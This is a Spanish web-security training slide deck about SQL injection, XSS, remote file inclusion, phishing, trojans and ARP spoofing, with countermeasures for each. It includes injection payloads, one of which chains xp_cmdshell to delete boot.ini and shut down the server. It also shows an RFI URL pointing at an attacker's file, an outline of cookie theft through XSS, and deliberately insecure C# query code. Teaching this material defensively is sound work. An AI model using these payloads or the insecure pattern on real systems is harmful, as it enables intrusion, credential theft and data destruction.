Monografias.com > Uncategorized
Descargar Imprimir Comentar Ver trabajos relacionados

Amenazas web (página 2)




Enviado por Pablo Turmero



Partes: 1, 2

Monografias.com

Explotación del Ataque
Aplicaciones con mala comprobación de datos de entrada.
Datos de usuario.
Formularios
Text
Password
Textarea
List
multilist
Datos de llamadas a procedimientos.
Links
Funciones Scripts
Actions

Datos de usuario utilizados en consultas a base de datos.

Mala construcción de consultas a bases de datos.

Monografias.com

Riesgos
Permiten al atacante:
Saltar restricciones de acceso.
Elevación de privilegios.
Extracción de información de la Base de Datos
Parada de SGBDR.
Ejecución de comandos en contexto usuario bd dentro del servidor.

Monografias.com

Tipos de Ataques
Ejemplo 1:
Autenticación de usuario contra base de datos.

Select idusuario from tabla_usuarios
Where nombre_usuario=‘$usuario’
And clave=‘$clave’;
Usuario
Clave
****************

Monografias.com

Tipos de Ataques
Ejemplo 1 (cont)

Select idusuario from tabla_usuarios
Where nombre_usuario=‘Administrador’
And clave=‘’ or ‘1’=‘1’;

Usuario
Clave
Administrador
‘ or ‘1’=‘1

Monografias.com

Demo

Monografias.com

Tipos de Ataques
Ejemplo 2:
Acceso a información con procedimientos de listado.

http://www.miweb.com/prog.asp?parametro1=hola

Ó

http://www.miweb.com/prog.asp?parametro1=1

Monografias.com

Tipos de Ataques
Ejemplo 2 (cont):

http://www.miweb.com/prog.asp?parametro1=‘ union select nombre, clave,1,1,1 from tabla_usuarios; otra instrucción; xp_cmdshell(“del c:boot.ini”); shutdown —

Ó

http://www.miweb.com/prog.asp?parametro1=-1 union select …..; otra instrucción; —

Monografias.com

Demo

Monografias.com

Contramedidas
No confianza en medias de protección en cliente.

Comprobación de datos de entrada.

Construcción segura de sentencias SQL.

Fortificación de Servidor Web.
Códigos de error.
Restricción de verbos, longitudes, etc..
Filtrado de contenido HTTP en Firewall.

Fortificación de SGBD.
Restricción de privilegios de motor/usuario de acceso desde web.
Aislamiento de bases de datos.

Monografias.com

Contramedidas
Desarrollo .NET
Redirigir a una página personalizada en caso de error
Web.Config

Mode ? On, Off, RemoteOnly
DefaultRedirect ? Error no especificado
< error…>?Errores específicos

< customErrors mode="RemoteOnly" defaultRedirect="GenericErrorPage.htm">
< error statusCode="403" redirect="NoAccess.htm"/>
< error statusCode="404" redirect="FileNotFound.htm"/>
< /customErrors>

Monografias.com

Contramedidas
Desarrollo .NET (Validadores)

Monografias.com

Contramedidas
Desarrollos en .NET (Código inseguro)
protected void Button1_Click(object sender, EventArgs e){
SqlConnection conn = new SqlConnection(connstr);
conn.Open();
SqlCommand cmd = new SqlCommand();
cmd.Connection = conn;
cmd.CommandText = "Select * from Usuarios where login='"+ txtLogin.Text +"‘
and password='"+ txtPassword.Text +"'";
cmd.CommandType = CommandType.Text;
SqlDataReader dr = cmd.ExecuteReader();
if (dr.HasRows){
//Código para permitir el paso a la aplicación
Response.Write("< script>alert('Acceso permitido');< /script>");
}
else{
//Codigo para rechazar el usuario
Response.Write("< script>alert('Acceso denegado');< /script>");
}
conn.Close();
}

Monografias.com

Contramedidas
Desarrollo .NET (Código seguro)
Consultas parametrizadas
protected void Button1_Click(object sender, EventArgs e){
SqlConnection conn = new SqlConnection(connstr);
conn.Open();
SqlCommand cmd = new SqlCommand();
cmd.Connection = conn;
cmd.CommandText = "Select * from Usuarios where login=@login
and password=@pass";
cmd.Parameters.AddWithValue("login", txtLogin);
cmd.Parameters.AddWithValue("pass", txtPassword.Text);
cmd.CommandType = CommandType.Text;
dr = cmd.ExecuteReader();
if (dr.HasRows){//Código para permitir el paso a la aplicación
Response.Write("< script>alert('Acceso permitido');< /script>");
} else{//Codigo para rechazar el usuario
Response.Write("< script>alert('Acceso denegado');< /script>");
} conn.Close(); }

Monografias.com

Vulnerabilidades: Cross-Site Scripting (XSS)

Monografias.com

Explotación del Ataque
Datos almacenados en servidor desde cliente.

Datos van a ser visualizados por otros cliente/usuario.

Datos no filtrados. No comprobación de que sean dañinos al cliente que visualiza.

Monografias.com

Riesgos
Ejecución de código en contexto de usuario que visualiza datos.

Navegación dirigida
Phising
Spyware
Robo de credenciales
Ejecución de acciones automáticas
Defacement

Monografias.com

Tipos de Ataques
Mensajes en Foros.
Firma de libro de visitas.
Contactos a través de web.
Correo Web.

En todos ellos se envían códigos Script dañinos.

Monografias.com

Robo de Sesiones (XSS)
Mediante esta técnica se puede robar sesiones de una manera bastante sencilla
Bastaría con realizar un script que llamase a una página alojada en nuestro servidor pasándole la cookie
Este Script se colaría en el servidor de la victima aprovechando un punto vulnerable a XSS
Cuando un usuario este logueado en el servidor y ejecute el script se enviara a nuestro servidor el contenido de la cookie

Monografias.com

Robo de Sesiones (XSS)
Una vez que la página obtiene la cookie (almacenandola por ejemplo en un fichero) mediante programas como Odysseus se puede hacer una llamada al servidor pasándole la cookie original
Por supuesto esta cookie es válida para robar la sesión solo mientras el usuario no cierre la sesión

Monografias.com

Contramedidas
Fortificación de aplicación
Comprobación fiable de datos

Fortificación de Clientes
Ejecución de clientes en entorno menos privilegiado.
Fortificación de navegador cliente.
MBSA.
Políticas.

Monografias.com

Contramedidas
Desarrollo .NET
En ASP.NET el Cross Site Scripting está deshabilitado por defecto
El Framework se encarga de buscar posibles ataques de este tipo en las entradas de datos
Se puede deshabilitar este tipo de verificación mediante un atributo de la directiva @Page
Para deshabilitarlo
< %@ Page … ValidateRequest=“false” … %>

Monografias.com

Vulnerabilidades: Remote File Inclusion (RFI)

Monografias.com

Remote File Inclusion (RFI)
Vulnerabilidad propia de páginas PHP dinámicas que permite enlace de archivos remotos situados en otros servidores
Se debe a una mala programación o uso de la función include()
Esta vulnerabilidad no se da en páginas programadas en un lenguaje que no permita la inclusión de ficheros ajenos al servidor

Monografias.com

Remote File Inclusion (RFI)
La vulnerabilidad es producida por código semejante a este

En páginas de este tipo se puede incluir ficheros que estén en nuestro servidor
$page = $_GET['page'];
include($page);
http://victima.com/pagvuln.php?page=http://[misitio]/miFichero

Monografias.com

Remote File Inclusion (RFI)
Existen herramientas que permite explorar un sitio Web en busca de este tipo de vulnerabilidades (rpvs)

Monografias.com

Remote File Inclusion (RFI)
Mediante las shell PHP se pueden ejecutar comandos en una página Web
Usando RFI se puede incluir un fichero que ejecute comandos, tales como listar directorios, obtener y colocar ficheros, etc.
“El inconveniente” es que la mayoría de servidores Web en PHP tienen deshabilitadas las funciones exec, system o passthru que impiden la ejecución de comandos

Monografias.com

Remote File Inclusion (RFI)
Sin embargo, existen funciones como show_source(‘archivo’) que permiten la visualización del código fuente de una página
A su vez, existen otra serie de funciones que nos permiten listar el contenido de un directorio
El uso de estas funciones no puede ser limitado y no depende del SO sobre el que se encuentra instalado el Servidor Web

Monografias.com

Vulnerabilidades: Phising

Monografias.com

Explotación del Ataque
Basado en técnicas de Ingeniería Social.

Se aprovecha de la confianza de los usuarios.

Se aprovecha de la falta de formación en seguridad de los usuarios.

Certificados digitales no generados por Entidades Emisoras de Certificados de confianza.

Monografias.com

Riesgos
Suplantación de Sitios Web para engañar al usuario.

Robo de credenciales de acceso a web restringidos.

Robo de dinero
Compras por Internet
Bromas pesadas

Monografias.com

Tipos de Ataques
Se falsea la dirección de DNS del servidor
Falsificación hosts
Troyanos, Físicamente, Shellcodes exploits
DHCP
DNS Spoofing
Man in The Middle

Se engaña la navegación.
Frames Ocultos
URLs falseadas.

Se implanta en la nueva ubicación un servidor replica.

Se implantan hasta fakes de certificados digitales

Monografias.com

Exploits
infohacking.com

Monografias.com

Contramedidas
Uso de CA de confianza
Formación a usuarios
Gestión de actualizaciones de seguridad
Códigos de aplicaciones seguras
Control físico de la red
Comprobación DHCP

Monografias.com

Vulnerabilidades: WebTrojan

Monografias.com

Explotación de Ataque
Servidores Web no fortificados
Ejecución de programas en almacenes de ficheros.

Subida de ficheros a servidores.
Imágenes para publicaciones.
Archivos de informes.
Currículos, cuentos, etc…

Almacenes de ficheros accesibles en remoto

Usuario en contexto servidor Web no controlado

Monografias.com

Riesgos
Implantación de un troyano que puede:
Gestionar ficheros
Ejecutar programas
Destrozar el sistema
Defacement
Robo de información
….

Monografias.com

Tipos de Ataques
Programación de un troyano en PHP, ASP o JSP

Utilización de objetos FileObject

Subida mediante ASP Upload, FTP o RFI

Busqueda del lugar de almacenamiento

Invocación por URL pública del servidor Web

Monografias.com

Demo

Monografias.com

Contramedidas
Fortificación de servidores Web

Menor Privilegio
Ejecución de programas en sitios restringidos
Listado de directorios ocultos
Usuario de servidor en contexto controlado

Subida de archivos controlada
Ubicación no accesible desde URL pública
Tipos de ficheros controlados
Tamaño, tipo, extensión, etc..
Filtrado vírico -> Rootkits

Monografias.com

Contramedidas
Desarrollo .NET
En ASP.NET se puede verificar la extensión del fichero que se sube al servidor
Evita la subida de ficheros potencialmente peligrosos
if (!FileUpload1.PostedFile.FileName.EndsWith(".jpg"))
{
//Error: El fichero no es del tipo esperado
}

Monografias.com

Vulnerabilidades: Capa 8

Monografias.com

Explotación de Ataque
Falta de conocimiento SD3
Diseño
Configuraciónes
Implantación

Administradores/Desarrolladores no formados en Seguridad
Hacking Ético

Falta de conocimiento del riesgo

Monografias.com

Riesgos
Insospechados:

Bases de datos públicas
No protección de datos
No protección de sistemas
…..

Monografias.com

Tipos de Ataques
Hacking Google

Administradores predecibles
http://www.misitio.com/administracion
http://www.misitio.com/privado
http://www.misitio.com/gestion
http://www.misitio.com/basedatos

Ficheros log públicos
WS_ftp.log

Estadísticas públicas
Webalyzer

Monografias.com

Demo

Monografias.com

Contramedidas
Formación

Ficheros Robots
Robots.txt

LOPD y LSSI
www.lssi.es

Writting Secure Code

Monografias.com

Contramedidas

Monografias.com

Troyanos
Sub“Hay un amigo en mi”

Monografias.com

Video
SubQue puede hacer un troyano

Monografias.com

Troyano
Programa que se ejecuta en tu máquina y cuyo control no depende de ti.
Como el …..
Mil formas, mil colores
Los Hackers la llaman la “girlfriend”

Monografias.com

Obtención de Privilegios
Fallo en la cadena:
Procesos:
Sistema no cerrado.
Tecnología:
Fallo en sw de sistema operativo
Fallo en sw ejecución de códigos.
Personas:
Ingeniería Social: “¡Que lindo programita!”
Navegación privilegiada

Monografias.com

Objetivos
Control remoto:
Instalan “suites” de gestión del sistema.
Robo de información
Modificación del sistema:
Phishing
Creación de usuarios
Planificación de tareas
….

Monografias.com

Instalación del Troyano
Se suele acompañar de “un caballo” para tranquilizar a la víctima.
Se añaden a otro software.
EJ: Whackamole
Joiners, Binders
Incluidos en documentos que ejecutan código:
Word, excel, swf, .class, pdf, html, etc…

Monografias.com

Instalación del Troyano
Simulando ser otro programa
P2P, HTTP Servers
Paquetes Zip autodescomprimibles
Programas con fallo de .dll
Instaladores de otro SW

Monografias.com

Demo:
SubUn troyano de andar por casa pa… phisear

Monografias.com

Demo:
SubUn troyano de andar por casa pa… meter un backdoor

Monografias.com

Demo:
SubUn troyano de andar por casa pa… abrir una shell

Monografias.com

Demo:
SubUn troyano de andar por casa pa… robar una shell

Monografias.com

Detección de Troyanos
Anti-Mallware
Antivirus
AntiSpyware
Comportamiento anómalo del sistema
Configuraciones nuevas
Cambio en páginas de navegación
Puertos
….

Monografias.com

Prevención contra Troyanos
Defensa en Profundidad
Mínimo Privilegio Posible
Mínimo punto de exposición

Gestión de updates de seguridad
Antivirus/AntiSpyware
Ejecución controlada de programas
Navegación segura

Monografias.com

Ataque:Envenenamiento ARP

Monografias.com

RFC 1180 – TCP/IP tutorial
There are security considerations within the TCP/IP protocol suite. To some people these considerations are serious problems, to others they are not; it depends on the user requirements. This tutorial does not discuss these issues, but if you want to learn more you should start with the topic of ARP-spoofing, then use the "Security Considerations" section of RFC 1122 to lead you to more information.

Monografias.com

Técnicas de Spoofing
Las técnicas spoofing tienen como objetivo suplantar validadores estáticos
Un validador estático es un medio de autenticación que permanece invariable antes, durante y después de la concesión.

Monografias.com

Niveles Afectados
SERVICIO
RED
Dirección IP
ENLACE
Dirección MAC
Nombres de dominio
Direcciones de correo electrónico
Nombres de recursos compartidos

Monografias.com

Tipos de técnicas de Spoofing
Spoofing ARP
Envenenamiento de conexiones.
Man in the Middle.

Spoofing IP
Rip Spoofing.
Hijacking.

Spoofing SMTP

Spoofing DNS
WebSpoofing.

Monografias.com

Técnicas de Sniffing
Capturan tráfico de red.

Necesitan que la señal física llegue al NIC.

En redes de difusión mediante concentradores todas las señales llegan a todos los participantes de la comunicación.

En redes conmutadas la comunicación se difunde en función de direcciones.
Switches utilizan dirección MAC.

Monografias.com

Nivel de Enlace: Spoofing ARP

Suplantar identidades físicas.

Saltar protecciones MAC.
Suplantar entidades en clientes DHCP.
Suplantar routers de comunicación.

Solo tiene sentido en comunicaciones locales.

Monografias.com

Dirección Física

Tiene como objetivo definir un identificador único para cada dispositivo de red.

Cuando una máquina quiere comunicarse con otra necesita conocer su dirección física.
Protocolo ARP

No se utilizan servidores que almacenen registros del tipo:
Dirección MAC < -> Dirección IP.

Cada equipo cuenta con una caché local donde almacena la información que conoce.

Monografias.com

Ataque ARP Man In The Middle
¿Quien tiene 1.1.1.2?
1.1.1.2 esta en99:88:77:66:55:44
1.1.1.2 esta en 00:11:22:33:44:55:66
1.1.1.1
1.1.1.2
1.1.1.1 esta en 99:88:77:66:55:44

Monografias.com

Protección contra Envenenamiento
Medidas preventivas.

Control físico de la red.
Bloqueo de puntos de acceso.
Segmentación de red.

Gestión de actualizaciones de seguridad.
Protección contra Exploits.
Protección contra troyanos.

Monografias.com

Protección contra Envenenamiento
Medidas preventivas.

Cifrado de comunicaciones.
IPSec.
Cifrado a nivel de Aplicación:
S/MIME.
SSL.

Certificado de comunicaciones.

Monografias.com

Medidas reactivas.

Utilización de detectores de Sniffers.

Utilizan test de funcionamiento anómalo.
Test ICMP.
Test DNS.
Test ARP.
Sistemas de Detección de Intrusos
Protección contra Envenenamiento

Monografias.com

Frase vs. Passwords
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?
?

Monografias.com

Web MVPs

Monografias.com

TechNews
Suscripción gratuita enviando un mail:
mailto:technews@informatica64.com

Partes: 1, 2
 Página anterior Volver al principio del trabajoPágina siguiente 

Nota al lector: es posible que esta página no contenga todos los componentes del trabajo original (pies de página, avanzadas formulas matemáticas, esquemas o tablas complejas, etc.). Recuerde que para ver el trabajo en su versión original completa, puede descargarlo desde el menú superior.

Todos los documentos disponibles en este sitio expresan los puntos de vista de sus respectivos autores y no de Monografias.com. El objetivo de Monografias.com es poner el conocimiento a disposición de toda su comunidad. Queda bajo la responsabilidad de cada lector el eventual uso que se le de a esta información. Asimismo, es obligatoria la cita del autor del contenido y de Monografias.com como fuentes de información.

Categorias
Newsletter